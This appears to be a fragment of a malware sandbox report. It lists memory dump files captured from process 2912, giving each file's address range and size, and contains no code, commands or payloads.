memory/2912-233-0x0000000000E80000-0x0000000000F2B000-memory.dmpFilesize
684KB
-
memory/2912-230-0x0000000000F90000-0x00000000010DC000-memory.dmpFilesize
1.3MB
-
memory/2912-363-0x0000000000F90000-0x00000000010DC000-memory.dmpFilesize
1.3MB
-
memory/2912-234-0x0000000002E00000-0x0000000002EDF000-memory.dmpFilesize
892KB
-
memory/2912-346-0x0000000002EE0000-0x0000000002F85000-memory.dmpFilesize
660KB
-
memory/2912-356-0x0000000002F90000-0x0000000003022000-memory.dmpFilesize
584KB
-
memory/2912-350-0x0000000002F90000-0x0000000003022000-memory.dmpFilesize
584KB
-
memory/2912-646-0x0000000000E80000-0x0000000000F2B000-memory.dmpFilesize
684KB